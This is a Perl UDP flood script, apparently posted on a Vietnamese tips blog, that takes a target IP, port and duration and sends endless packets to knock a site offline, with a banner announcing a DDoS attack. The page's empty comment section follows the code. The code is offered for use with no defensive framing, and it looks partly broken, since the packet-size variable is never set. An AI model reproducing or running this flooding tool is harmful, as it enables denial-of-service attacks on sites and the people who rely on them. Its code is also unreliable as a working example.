#!/usr/bin/perl
#####################################################
# UDP FLOOD !!.
#
# HSH.
#
# --/HSH
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "
########################
#                      #
#     DDoS Attack      #
#    Made By Jo3       #
# Copyright (c) 2015   #
########################

Packets : 8000 // Soon The Site Will Go Down !!\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65500) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/08/share-code-ddos-doublev2.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé